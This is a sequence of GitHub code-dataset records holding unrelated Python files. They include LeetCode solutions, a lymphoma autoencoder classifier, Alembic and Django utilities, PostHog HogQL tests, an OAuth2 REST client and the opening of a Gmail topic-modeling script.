self.sequencer.addr_ph_port.connect(self.monitor.addr_ph_imp)\n\n\nuvm_component_utils(eng_agnt)\n","repo_name":"Mohsannaeem/mohsan_hw","sub_path":"verif/adder/uvm_tb/agent/eng_agnt.py","file_name":"eng_agnt.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"72685468328","text":"class Solution(object):\n def nextPermutation(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: void Do not return anything, modify nums in-place instead.\n \"\"\"\n pos=-1\n for i in range(len(nums)-1,0,-1):\n if nums[i-1] < nums[i]:\n pos=i-1\n break\n if pos == -1:\n nums.reverse()\n return\n else:\n for j in range(len(nums)-1,pos,-1):\n if nums[j] > nums[pos]:\n nums[pos],nums[j]=nums[j],nums[pos]\n break\n nums[pos+1:]=nums[pos+1:][::-1]\n return","repo_name":"zazaliu/leetcode-python","sub_path":"array/31. Next Permutation.py","file_name":"31. Next Permutation.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33286601969","text":"\n# --------------------------------------------------------------------------------------------------\n\n# Libraries\nimport os\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\nimport pickle\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nimport seaborn as sns\nimport random as rd\nimport keras\n\nfrom numpy.random import seed\nfrom sklearn import preprocessing\nfrom sklearn.preprocessing import minmax_scale\nfrom sklearn.decomposition import PCA\nfrom sklearn.model_selection import train_test_split\nfrom keras.layers import Input, add\nfrom keras.layers.core import Layer, Dense, Dropout, Activation, Flatten, Reshape\nfrom keras import regularizers\nfrom keras.regularizers import l2\nfrom keras.utils import np_utils\nfrom keras.models import Model, load_model\nfrom keras.callbacks import ModelCheckpoint, TensorBoard\nfrom scipy import stats\nfrom pylab import rcParams\n\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.wrappers.scikit_learn import KerasClassifier\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.model_selection import StratifiedKFold\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.pipeline import Pipeline\n\n# --------------------------------------------------------------------------------------------------\n\n# Read data\ndata = pd.read_csv('dlbcl_preprocessed.txt', sep=\" \", header=None)\n\nprint(data.shape)\n\ndata_t = data.T\n\n# create header var\nheader = data_t.iloc[0]\n\n# Replace the dataframe with a new one which does not contain the first row\ndata_t = data_t[1:]\n# Rename the dataframe's column values with the header variable\ndata_t.rename(columns = header)\n\n# --------------------------------------------------------------------------------------------------\n\n# Cleaning Dataset\n\n# replace\ndata.y.replace((0, 1), ('normal', 'tumor'), inplace=True)\n\n# data rearrange\nY = data_t.iloc[:,2647] #58-19\nX = data_t.iloc[:,0:2646]\n\nX.shape, Y.shape\n\n# --------------------------------------------------------------------------------------------------\n\n# Principal Component Analysis\n\nfrom sklearn.preprocessing import StandardScaler\n# Standardizing the features\nX = StandardScaler().fit_transform(X)\n\npca = PCA(n_components = 77)\nX_r = pca.fit(X.T)\n\nprint(pca.explained_variance_ratio_[1:30])\npca.components_.shape\n\nper_var = np.round(pca.explained_variance_ratio_* 100, decimals=1)\nlabels = ['PC' + str(x) for x in range(1, len(per_var)+1)]\n\n# plot of percentage of explained variance\nplt.bar(x=range(1,len(per_var)+1), height=per_var, tick_label=labels)\nplt.axvline(x=41, color='g', linestyle ='dashed',linewidth=1)\nplt.ylabel('Percentage of Explained Variance')\nplt.xlabel('Principal Component')\nplt.title('Scree Plot')\nplt.show()\n\ncumsum_ = np.cumsum(pca.explained_variance_ratio_)\nr = range(0,77)\n\n# how many features for the 90% percentile\nplt.plot(r,cumsum_)\nplt.axvline(x=41, color='g', linestyle ='dashed',linewidth=1)\nplt.axhline(y=0.9, color='g', linestyle ='dashed',linewidth=1)\n\n# Determine which genes had the biggest influence on PC1\n\n# get the name of the top 10 measurements (genes) that contribute\n# most to pc1.\n# first, get the loading scores\nloading_scores = pd.Series(pca.components_[0])\n# now sort the loading scores based on their magnitude\nsorted_loading_scores = loading_scores.abs().sort_values(ascending=False)\n\n# get the names of the top 10 genes\ntop_10_genes = sorted_loading_scores[0:10].index.values\n\n# print the gene names and their scores (and +/- sign)\nprint(loading_scores[top_10_genes], '\\n', header[[12,7,28,15,20,8,41,1,17,91]])\n\n\n# PCA Classification with Neural Network\n\n# NNet for classifier w\\ softmax\nseed = 23\nnp.random.seed(seed)\n\n# encode class values as integers\nencoder = LabelEncoder()\nencoder.fit(Y)\nencoded_Y = encoder.transform(Y)\n\ndef create_baseline():\n\t# create model\n\tmodel = Sequential()\n\tmodel.add(Dense(77, input_dim=77, kernel_initializer='normal', activation='relu'))\n\tmodel.add(Dense(1, kernel_initializer='normal', activation='sigmoid'))\n\t# Compile model\n\tmodel.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])\n\treturn model\n\n# 1 evaluate model with standardized dataset\nestimator = KerasClassifier(build_fn=create_baseline, epochs=100, batch_size=5, verbose=0)\nkfold = StratifiedKFold(n_splits=10, shuffle=True, random_state=seed)\nresults = cross_val_score(estimator, pca.components_, encoded_Y, cv=kfold)\nprint(\"Results: %.2f%% (%.2f%%)\" % (results.mean()*100, results.std()*100))\n# Results: 69.05% (9.86%)\n\n# 2 larger model\ndef create_larger():\n\t# create model\n\tmodel = Sequential()\n\tmodel.add(Dense(77, input_dim=77, kernel_initializer='normal', activation='relu'))\n\tmodel.add(Dense(35, kernel_initializer='normal', activation='relu'))\n\tmodel.add(Dense(1, kernel_initializer='normal', activation='sigmoid'))\n\t# Compile model\n\tmodel.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])\n\treturn model\nestimators = []\nestimators.append(('standardize', StandardScaler()))\nestimators.append(('mlp', KerasClassifier(build_fn=create_larger, epochs=100, batch_size=5, verbose=0)))\npipeline = Pipeline(estimators)\nkfold = StratifiedKFold(n_splits=10, shuffle=True, random_state=seed)\nresults = cross_val_score(pipeline, pca.components_, encoded_Y, cv=kfold)\nprint(\"Larger: %.2f%% (%.2f%%)\" % (results.mean()*100, results.std()*100))\n# Larger: 71.73% (10.34%)\n\n# 3 smaller model\ndef create_smaller():\n\t# create model\n\tmodel = Sequential()\n\tmodel.add(Dense(35, input_dim=77, kernel_initializer='normal', activation='relu'))\n\tmodel.add(Dense(1, kernel_initializer='normal', activation='sigmoid'))\n\t# Compile model\n\tmodel.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])\n\treturn model\nestimators = []\nestimators.append(('standardize', StandardScaler()))\nestimators.append(('mlp', KerasClassifier(build_fn=create_smaller, epochs=100, batch_size=5, verbose=0)))\npipeline = Pipeline(estimators)\nkfold = StratifiedKFold(n_splits=10, shuffle=True, random_state=seed)\nresults = cross_val_score(pipeline, pca.components_, encoded_Y, cv=kfold)\nprint(\"Smaller: %.2f%% (%.2f%%)\" % (results.mean()*100, results.std()*100))\n# Smaller: 72.98% (5.95%)\n\n\n# --------------------------------------------------------------------------------------------------\n\n# Sparse Autoencoder\n\nY = data_t.iloc[:,2647]\n\nn = int(data_t.shape[1]*0.1)\ns = np.random.randint(1,2646, n)\n\ndf_ = pd.DataFrame(data_, index=list(range(0, 77))) #77x77\ndf_raw = pd.DataFrame(data_t.iloc[:,s], index=list(range(1,77))) #76x264\n\nX = pd.concat([df_.iloc[1:77,0:76], df_raw], axis=1, join_axes=[df_.iloc[1:102,0:101].index]) #76x340\n\nXs = minmax_scale(X, axis = 0)\nncol = Xs.shape[1]\n\nXs.shape,ncol\n\n# TRAIN e TEST\nS_X_train, S_X_test, S_Y_train, S_Y_test = train_test_split(Xs, Y[1:77], test_size = 0.4)\nS_X_test.shape, S_X_train.shape\n\n#------------------\n#Sparse Autoencoder\n#------------------\n# from keras import optimizers\n# # All parameter gradients will be clipped to a maximum norm of 1.\nsgd = optimizers.SGD(lr=0.01, clipvalue=0.5)\n\ninput_dim = Input(shape = (ncol, ))\nencoding_dim = 75\nencoded = Dense(encoding_dim, activation = 'sigmoid',activity_regularizer=regularizers.l1(10e-5))(input_dim)\ndecoded = Dense(ncol, activation = 'sigmoid')(encoded)\nautoencoder = Model(inputs = input_dim, outputs = decoded)\nautoencoder.compile(optimizer = 'adam', loss = 'mse')\nhistory = autoencoder.fit(S_X_train, S_X_train, epochs = 1000, batch_size = 15, shuffle = True, validation_data = (S_X_test, S_X_test), verbose=0)\n\n# THE ENCODER TO EXTRACT THE REDUCED DIMENSION FROM THE ABOVE AUTOENCODER\nencoder = Model(inputs = input_dim, outputs = encoded)\nencoded_input = Input(shape = (encoding_dim, ))\nencoded_out = encoder.predict(S_X_test)\nencoded_out2 = encoder.predict(S_X_train)\nresult = encoder.predict(Xs)\n\n#print shape\nencoded_out.shape, encoded_out2.shape\n\n# Plot all losses\nprint(history.history.keys())\n\nplt.plot(history.history['loss'])\nplt.plot(history.history['val_loss'])\nplt.title('model loss')\nplt.ylabel('loss')\nplt.xlabel('epoch')\nplt.legend(['train', 'validation'], loc='upper right')\nplt.show()\n\n\n# Classification\n\n# NNet for classifier w\\ softmax\nseed = 23\nnp.random.seed(seed)\n\nS_Y = Y.iloc[1:77]\n\n# encode class values as integers\nencoder = LabelEncoder()\nencoder.fit(S_Y)\nencoded_Y = encoder.transform(S_Y)\n\ndef create_baseline():\n\t# create model\n\tmodel = Sequential()\n\tmodel.add(Dense(75, input_dim=75, kernel_initializer='normal', activation='relu'))\n\tmodel.add(Dense(1, kernel_initializer='normal', activation='sigmoid'))\n\t# Compile model\n\tmodel.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])\n\treturn model\n\n# 1 evaluate model with standardized dataset\nestimator = KerasClassifier(build_fn=create_baseline, epochs=100, batch_size=5, verbose=0)\nkfold = StratifiedKFold(n_splits=10, shuffle=True, random_state=seed)\nresults = cross_val_score(estimator, result, encoded_Y, cv=kfold)\nprint(\"Results: %.2f%% (%.2f%%)\" % (results.mean()*100, results.std()*100))\n# Results: 90.00% (9.35%)\n\n# 2 larger model\ndef create_larger():\n\t# create model\n\tmodel = Sequential()\n\tmodel.add(Dense(75, input_dim=75, kernel_initializer='normal', activation='relu'))\n\tmodel.add(Dense(35, kernel_initializer='normal', activation='relu'))\n\tmodel.add(Dense(1, kernel_initializer='normal', activation='sigmoid'))\n\t# Compile model\n\tmodel.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])\n\treturn model\nestimators = []\nestimators.append(('standardize', StandardScaler()))\nestimators.append(('mlp', KerasClassifier(build_fn=create_larger, epochs=100, batch_size=5, verbose=0)))\npipeline = Pipeline(estimators)\nkfold = StratifiedKFold(n_splits=10, shuffle=True, random_state=seed)\nresults = cross_val_score(pipeline, result, encoded_Y, cv=kfold)\nprint(\"Larger: %.2f%% (%.2f%%)\" % (results.mean()*100, results.std()*100))\n# Larger: 92.50% (8.29%)\n\n# 3 smaller model\ndef create_smaller():\n\t# create model\n\tmodel = Sequential()\n\tmodel.add(Dense(35, input_dim=75, kernel_initializer='normal', activation='softmax'))\n\tmodel.add(Dense(1, kernel_initializer='normal', activation='sigmoid'))\n\t# Compile model\n\tmodel.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])\n\treturn model\nestimators = []\nestimators.append(('standardize', StandardScaler()))\nestimators.append(('mlp', KerasClassifier(build_fn=create_smaller, epochs=100, batch_size=5, verbose=0)))\npipeline = Pipeline(estimators)\nkfold = StratifiedKFold(n_splits=10, shuffle=True, random_state=seed)\nresults = cross_val_score(pipeline, result, encoded_Y, cv=kfold)\nprint(\"Smaller: %.2f%% (%.2f%%)\" % (results.mean()*100, results.std()*100))\n# Smaller: 85.65% (10.39%)\n","repo_name":"AlessioPeluso/Lymphoma-classification-","sub_path":"Lymphoma_AutoEncoder.py","file_name":"Lymphoma_AutoEncoder.py","file_ext":"py","file_size_in_byte":10757,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"1136367611","text":"#!/usr/bin/env python\nimport xmlrpclib,pprint\nserver = xmlrpclib.Server('http://adam:fred123@localhost/zidestore/so/adam/')\nstatus = { }\n#status['comment'] = 'This is my very pretty comment.'\nstatus['objectId'] = 10700730\n#status['rsvp'] = 0\n#status['status'] = 'ACCEPTED'\nstatus['entityName'] = 'ParticipantStatus'\npprint.pprint(server.zogi.putObject(status))\n\n","repo_name":"BGCX261/zogi-svn-to-git","sub_path":"trunk/TestScripts/participantStatus.py","file_name":"participantStatus.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26026031145","text":"from __future__ import annotations\nimport typing as t\n\nfrom alembic.operations import Operations, MigrateOperation\nfrom sqlalchemy_utils.view import CreateView, DropView\n\nif t.TYPE_CHECKING:\n from sqlalchemy import Select\n\n\n@Operations.register_operation('create_view')\nclass CreateViewOp(MigrateOperation):\n \"\"\"Create a VIEW.\"\"\"\n\n def __init__(\n self,\n view_name: str,\n selectable: Select[t.Any],\n materialized: bool = False,\n schema: t.Optional[str] = None,\n ) -> None:\n self.view_name = view_name\n self.selectable = selectable\n self.materialized = materialized\n self.schema = schema\n\n @classmethod\n def create_view(\n cls,\n operations: Operations,\n view_name: str,\n selectable: Select[t.Any],\n materialized: bool = False,\n **kw: t.Any,\n ) -> None:\n \"\"\"Issue a \"CREATE VIEW\" instruction.\"\"\"\n op = cls(view_name, selectable, materialized, **kw)\n operations.invoke(op)\n\n def reverse(self) -> DropViewOp:\n # only needed to support autogenerate\n return DropViewOp(self.view_name, schema=self.schema)\n\n\n@Operations.register_operation('drop_view')\nclass DropViewOp(MigrateOperation):\n \"\"\"Drop a VIEW.\"\"\"\n\n def __init__(\n self,\n view_name: str,\n materialized: bool = False,\n cascade: bool = True,\n schema: t.Optional[str] = None,\n ) -> None:\n self.view_name = view_name\n self.materialized = materialized\n self.cascade = cascade\n self.schema = schema\n\n @classmethod\n def drop_view(\n cls,\n operations: Operations,\n view_name: str,\n materialized: bool = False,\n cascade: bool = True,\n **kw: t.Any,\n ) -> None:\n \"\"\"Issue a \"DROP VIEW\" instruction.\"\"\"\n op = cls(view_name, materialized, cascade, **kw)\n operations.invoke(op)\n\n\n@Operations.implementation_for(CreateViewOp)\ndef create_view(operations: Operations, operation: CreateViewOp) -> None:\n if operation.schema is not None:\n name = '%s.%s' % (operation.schema, operation.view_name)\n else:\n name = operation.view_name\n operations.execute(CreateView(name, operation.selectable))\n\n\n@Operations.implementation_for(DropViewOp)\ndef drop_view(operations: Operations, operation: DropViewOp) -> None:\n if operation.schema is not None:\n name = '%s.%s' % (operation.schema, operation.view_name)\n else:\n name = operation.view_name\n operations.execute(DropView(name))\n","repo_name":"kyzima-spb/flask-useful","sub_path":"src/flask_useful/alembic.py","file_name":"alembic.py","file_ext":"py","file_size_in_byte":2554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24985442307","text":"# chat/consumers.py\nimport json\nfrom channels.generic.websocket import WebsocketConsumer\nfrom asgiref.sync import async_to_sync\nfrom .models import ChatMessage\n\n\nclass ChatConsumer(WebsocketConsumer):\n \n def connect(self):\n\n self.room_group_name = 'test'\n async_to_sync(self.channel_layer.group_add)(\n self.room_group_name,\n self.channel_name\n )\n print(\"SE HA CONECTADO AL CHATBOT\")\n print(f\"Canal agregado al grupo. Nombre del canal: {self.channel_name}\")\n\n self.accept()\n\n def disconnect(self, close_code):\n print(\"SE HA DESCONECTADO\")\n pass\n\n def receive(self, text_data):\n \n text_data_json = json.loads(text_data)\n message = text_data_json[\"message\"]\n\n #self.send(text_data=json.dumps({\"message\": message}))\n async_to_sync(self.channel_layer.group_send)(\n self.room_group_name,\n {\n 'type':'chat_message',\n 'message': message\n }\n )\n print(\"SE HA RECIBIDO\")\n \n def chat_message(self,event):\n try:\n session_id = self.scope.get('session').session_key\n message = event['message']\n self.send(text_data = json.dumps(\n {\n 'type':'chat',\n 'message':message\n }\n ))\n\n print('Se ha llamado : CHATBOT_MESSAGE')\n print('Sesion ID: '+session_id)\n message = event['message']\n except TypeError:\n print(\"error en chat_message\")\n\n # Guardar el mensaje en la base de datos\n if message !='':\n ChatMessage.objects.create(message=message)\n print('Mensaje guardado en el consumer')\n ","repo_name":"Fckworld/channels","sub_path":"mysite/chatbot/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":1779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38359188872","text":"import sys\nsys.path.insert(0, '../')\n\nfrom tms.base import Configuration\nfrom oauthlib.oauth2 import LegacyApplicationClient\nfrom requests_oauthlib import OAuth2Session\nimport requests\nimport json\nimport ast\n\nclass SetUp(Configuration):\n \"\"\"\n This class supports setting up the client before requesting data from the TMS REST API. This includes acquiring a\n token to assist with OAuth2 authentication and creating the header which is necessary to be used for any REST API\n request.\n \"\"\"\n\n def __init__(self):\n Configuration.__init__(self)\n\n self.token_url = self.get_configuration_for('service', 'token_url')\n self.username = self.get_configuration_for('service', 'username')\n self.password = self.get_configuration_for('service', 'password')\n self.client_id = self.get_configuration_for('service', 'client_id')\n self.client_secret = self.get_configuration_for('service', 'client_secret')\n self.scope = ast.literal_eval(self.get_configuration_for('service', 'scope'))\n self.api_url = self.get_configuration_for('service', 'api_url')\n\n def get_token(self):\n \"\"\"(None) -> str\n This REST API is using OAuth2 for authentication. Multiple OAuth2 authentication flows are supported. The quickest\n flow supported is the \"Resource Owner Password Credentials Grant flow\". To authentication using OAuth2 in Python\n this method is using the modules \"oauthlib\" and \"requests_oauthlib\" which need to be installed prior using this\n method. In order to authenticate with this oauth2 flow you need the following information:\n Resource Owner Name, Resource Owner Password, Client Identification, Client Secret, Access Token URI, and Scope.\n >>>get_token()\n xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\n \"\"\"\n\n self.oauth = OAuth2Session(client=LegacyApplicationClient(client_id=self.client_id))\n self.data = self.oauth.fetch_token(\n token_url=self.token_url,\n username=self.username,\n password=self.password,\n client_id=self.client_id,\n client_secret=self.client_secret)\n\n self.token = str(self.data[u'access_token'])\n return self.token\n\n def create_header(self):\n \"\"\"(None) -> dict\n Returns a dictionary which includes the data needed for making a request to the TMS REST API using requests.\n In the example provided below the 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx' represents the token.\n >>>create_header()\n {'Authorization': 'Bearer xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'}\n \"\"\"\n\n self.header = {'Authorization': 'Bearer %s' % (self.token)}\n return self.header\n\n\nclass RestRequests(Configuration):\n\n def __init__(self, token, headers):\n\n Configuration.__init__(self)\n self.headers = headers\n self.token = token\n\n def get(self, url):\n r = requests.get(url, headers=self.headers)\n if r.status_code == 200:\n return json.loads(r.content)\n else:\n return r.status_code\n","repo_name":"Improvement-Service/TMS_API_Usage_Example","sub_path":"tms/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":3103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27508686513","text":"import ast\r\n\r\ndef get_stud():#學號\r\n txt=\"1b\"\r\n data = open(txt).read().split(\"\\n\")\r\n stud = data[:-1]\r\n return stud\r\ncp_stud = get_stud()\r\n \r\ncp_w11_quiz_=\"1btest.json\"\r\n\r\ndef get_score(json):#考試結果\r\n person = 0\r\n score = 0\r\n json_data = open(json).read()\r\n big_dict = ast.literal_eval(json_data)\r\n testuser = big_dict[\"body\"][\"testuser\"]\r\n quiz_dict = {}\r\n for i in testuser:\r\n stud_id = testuser[i][\"user_name\"]\r\n stud_score = int(float( testuser[i][\"total_score\"]))\r\n quiz_dict[stud_id] = stud_score\r\n person = person + 1\r\n score = score + stud_score\r\n return quiz_dict, person, score\r\n \r\n#cp_quiz, num_stud, total_score = get_score(cp_w10_quiz_url)\r\ncp_quiz, person, score = get_score(cp_w11_quiz_)\r\ncp_abs = []\r\nfor stud in cp_stud:\r\n try:\r\n print(stud, cp_quiz[stud])\r\n except:\r\n # 缺考者沒有 quiz 成績\r\n print(stud, \"缺\")\r\n cp_abs.append(stud)\r\nprint (\"\\n參考人數%s\"%(person))\r\nprint (\"\\n以下為總分%s\"%(score)) \r\nprint(\"\\n考試平均分數為:\", int(score/person))\r\n#列出缺考名單\r\nprint(\"=\"*20)\r\nprint(\"以下為 w11 缺考名單:\")\r\nfor stud in cp_abs:\r\n print(stud)","repo_name":"SnowNightOwO/Snow","sub_path":"HW10,11考試結果調查(功課)/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72134034729","text":"from typing import List\n\n\nclass Solution:\n def fullJustify(self, words: List[str], maxWidth: int) -> List[str]:\n ans = []\n now = 0\n sub_str = []\n number = 0\n for string in words:\n if now + len(string) + 1 <= maxWidth:\n now = now + len(string) + 1\n sub_str.append(string)\n number = number + 1\n elif now + len(string) == maxWidth:\n sub_ans = \"\"\n for index in sub_str:\n sub_ans += index + \" \"\n sub_ans += string\n ans.append(sub_ans)\n now = 0\n sub_str.clear()\n number = 0\n elif number != 1:\n sub_ans = \"\"\n number = number - 1\n space = (maxWidth - now + 1) / number\n space = int(space)\n res = (maxWidth - now + 1) % number\n for index in sub_str[:len(sub_str) - 1:]:\n sub_ans += index + \" \" + \" \" * space\n if res != 0:\n sub_ans += \" \"\n res -= 1\n sub_ans += sub_str[-1]\n ans.append(sub_ans)\n now = len(string) + 1\n sub_str.clear()\n sub_str.append(string)\n number = 1\n else:\n sub_ans = sub_str[0]\n sub_ans += \" \" * (maxWidth - len(sub_ans))\n ans.append(sub_ans)\n now = len(string) + 1\n sub_str.clear()\n sub_str.append(string)\n number = 1\n sub_ans = \"\"\n if sub_str:\n for string in sub_str:\n sub_ans += string + \" \"\n sub_ans = sub_ans[:-1]\n sub_ans += \" \" * (maxWidth - len(sub_ans))\n ans.append(sub_ans)\n return ans\n\n\nif __name__ == '__main__':\n words = [\"Science\",\"is\",\"what\",\"we\",\"understand\",\"well\",\"enough\",\"to\",\"explain\",\n \"to\",\"a\",\"computer.\",\"Art\",\"is\",\"everything\",\"else\",\"we\",\"do\"]\n maxWidth = 20\n print(Solution().fullJustify(words, maxWidth))\n","repo_name":"kelolemon/homework","sub_path":"python_project/lt68.py","file_name":"lt68.py","file_ext":"py","file_size_in_byte":2162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10753047734","text":"#submission 49\nimport pandas as pd\n\n#Perform all the necessary preprocessing steps on the Red_Wine data\ndf = pd.read_csv('Red_Wine.csv')\n\ndf['wine names']=df['wine names'].fillna(df['wine names'].mode()[0]) #removing NaN\nfor i in df.iloc[:,1:]:\n df[i] = df[i].fillna(df[i].mean())\n\n#split into features and labels \nfeatures = df.iloc[:,:-1]\nlabels = df.iloc[:,-1]\n\n#categorial data processing using pandas\nfeatures.iloc[:,0] = features.iloc[:,0].astype('category').cat.codes\nlabels = labels.astype('category').cat.codes\nfeatures = pd.get_dummies(features,columns=['wine names'])\n\n#Split the data into train and test sets\nfrom sklearn.model_selection import train_test_split as tts\nf_test,f_train,l_test,l_train = tts(features,labels,random_state=0,test_size=.25)\n","repo_name":"nimish19/Learning_ML","sub_path":"09-01-2019/nimish_agarwal49.py","file_name":"nimish_agarwal49.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39510993009","text":"from posthog.hogql import ast\nfrom posthog.hogql.errors import HogQLException\nfrom posthog.hogql.parser import parse_expr\nfrom posthog.hogql.placeholders import replace_placeholders, find_placeholders\nfrom posthog.test.base import BaseTest\n\n\nclass TestParser(BaseTest):\n def test_find_placeholders(self):\n expr = parse_expr(\"{foo} and {bar}\")\n self.assertEqual(sorted(find_placeholders(expr)), sorted([\"foo\", \"bar\"]))\n\n def test_replace_placeholders_simple(self):\n expr = parse_expr(\"{foo}\")\n self.assertEqual(\n expr,\n ast.Placeholder(field=\"foo\", start=0, end=5),\n )\n expr2 = replace_placeholders(expr, {\"foo\": ast.Constant(value=\"bar\")})\n self.assertEqual(\n expr2,\n ast.Constant(value=\"bar\", start=0, end=5),\n )\n\n def test_replace_placeholders_error(self):\n expr = ast.Placeholder(field=\"foo\")\n with self.assertRaises(HogQLException) as context:\n replace_placeholders(expr, {})\n self.assertEqual(\n \"Placeholders, such as {foo}, are not supported in this context\",\n str(context.exception),\n )\n with self.assertRaises(HogQLException) as context:\n replace_placeholders(expr, {\"bar\": ast.Constant(value=123)})\n self.assertEqual(\n \"Placeholder {foo} is not available in this context. You can use the following: bar\",\n str(context.exception),\n )\n\n def test_replace_placeholders_comparison(self):\n expr = parse_expr(\"timestamp < {timestamp}\")\n self.assertEqual(\n expr,\n ast.CompareOperation(\n start=0,\n end=23,\n op=ast.CompareOperationOp.Lt,\n left=ast.Field(chain=[\"timestamp\"], start=0, end=9),\n right=ast.Placeholder(field=\"timestamp\", start=12, end=23),\n ),\n )\n expr2 = replace_placeholders(expr, {\"timestamp\": ast.Constant(value=123)})\n self.assertEqual(\n expr2,\n ast.CompareOperation(\n start=0,\n end=23,\n op=ast.CompareOperationOp.Lt,\n left=ast.Field(chain=[\"timestamp\"], start=0, end=9),\n right=ast.Constant(value=123, start=12, end=23),\n ),\n )\n\n def test_assert_no_placeholders(self):\n expr = ast.Placeholder(field=\"foo\")\n with self.assertRaises(HogQLException) as context:\n replace_placeholders(expr, None)\n self.assertEqual(\n \"Placeholders, such as {foo}, are not supported in this context\",\n str(context.exception),\n )\n","repo_name":"PostHog/posthog","sub_path":"posthog/hogql/test/test_placeholders.py","file_name":"test_placeholders.py","file_ext":"py","file_size_in_byte":2673,"program_lang":"python","lang":"en","doc_type":"code","stars":14422,"dataset":"github-code","pt":"53"} +{"seq_id":"24792421249","text":"from django.contrib import admin\nfrom . import models\nfrom django.utils.safestring import mark_safe\n# ==================================\n\n# classes\nclass ArtistAdmin(admin.ModelAdmin):\n prepopulated_fields = {'slug': ('name',), }\n list_display = ('name','slug')\n search_fields = ('name','slug')\n\n\nclass CategoryAdmin(admin.ModelAdmin):\n prepopulated_fields = {'slug':('title',),}\n list_display = ('title','slug')\n\n\nclass SongAdmin(admin.ModelAdmin):\n prepopulated_fields = {'slug': ('title',), }\n list_display = ('title','slug','artist','category','get_cover')\n search_fields = ('title','artist__name','category__title')\n\n def get_cover(self,obj):\n return mark_safe(f'')\n get_cover.short_description = 'cover'\n \n# Register your models here.\n\nadmin.site.register(models.SongVote)\nadmin.site.register(models.Category,CategoryAdmin)\nadmin.site.register(models.Song,SongAdmin)\nadmin.site.register(models.Artist,ArtistAdmin)\n\n","repo_name":"Pouria03/Music-website","sub_path":"song/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10814847794","text":"from itertools import permutations \n \nclass Solution(object):\n def countArrangement(self, N):\n self.res = 0\n def dfs(n,tmp,remain):\n if n==N+1:\n self.res+=1\n else:\n for i in range(len(remain)): \n if remain[i]%n==0 or n%remain[i]==0:\n dfs(n+1,tmp+[i],remain[:i]+remain[i+1:])\n dfs(1,[],[i+1 for i in range(N)])\n return self.res\n\n ","repo_name":"Ayushmanglani/competitive_coding","sub_path":"leetcode/Jan_2021/3_BeautifulArrangement.py","file_name":"3_BeautifulArrangement.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"72439240808","text":"import time\ndef fibo_max(max:int):\n n1,n2 = 0,1\n counter = 0\n while True:\n if counter <= max:\n yield n1\n aux = n1+n2\n n1,n2 = n2, aux\n counter += 1\n else:\n raise StopIteration\n\nif __name__ == \"__main__\":\n fibonacci = fibo_max(20)\n for element in fibonacci:\n print (element)\n time.sleep(1)\n \n ","repo_name":"cquinayas/curso-profesional-python","sub_path":"generator_challenge.py","file_name":"generator_challenge.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27602438332","text":"\"\"\"\nPerform LDA (Latent Dirichlet Allocation) on a gmail inbox\nto cluster e-mails into topics (topic modeling)\n\nStarter code for validating credentials from:\n https://developers.google.com/gmail/api/quickstart/python\n\nAuthor: Darshan Thaker\n\"\"\"\n#!/usr/bin/python\n\nfrom __future__ import print_function\nimport httplib2\nimport os\nimport pprint\nimport base64\nimport time\nimport sys\nimport threading\n\nfrom apiclient import discovery\nfrom gensim import corpora, models, similarities\nfrom collections import defaultdict\nimport oauth2client\nfrom oauth2client import client\nfrom oauth2client import tools\n\ntry:\n import argparse\n parser = argparse.ArgumentParser(parents=[tools.argparser])\n parser.add_argument(\"nWorkers\", type=int)\n parser.add_argument(\"preExisting\", type=int)\n newFlags = parser.parse_args()\n # These flags are for getCredentials function for Gmail API\n flags = parser.parse_args()\n del flags.nWorkers\n del flags.preExisting\nexcept ImportError:\n flags = None\n\n\"\"\"\n My barrier implementation for Python2.7\n\"\"\"\nclass Barrier:\n \"\"\"\n Constructor for Barrier\n Input: n for number of threads that need to be\n synchronized.\n \"\"\"\n def __init__(self, n):\n self.togo = n\n self.sem = threading.Semaphore(0)\n self.mutex = threading.Semaphore(1)\n self.count = 0\n \n 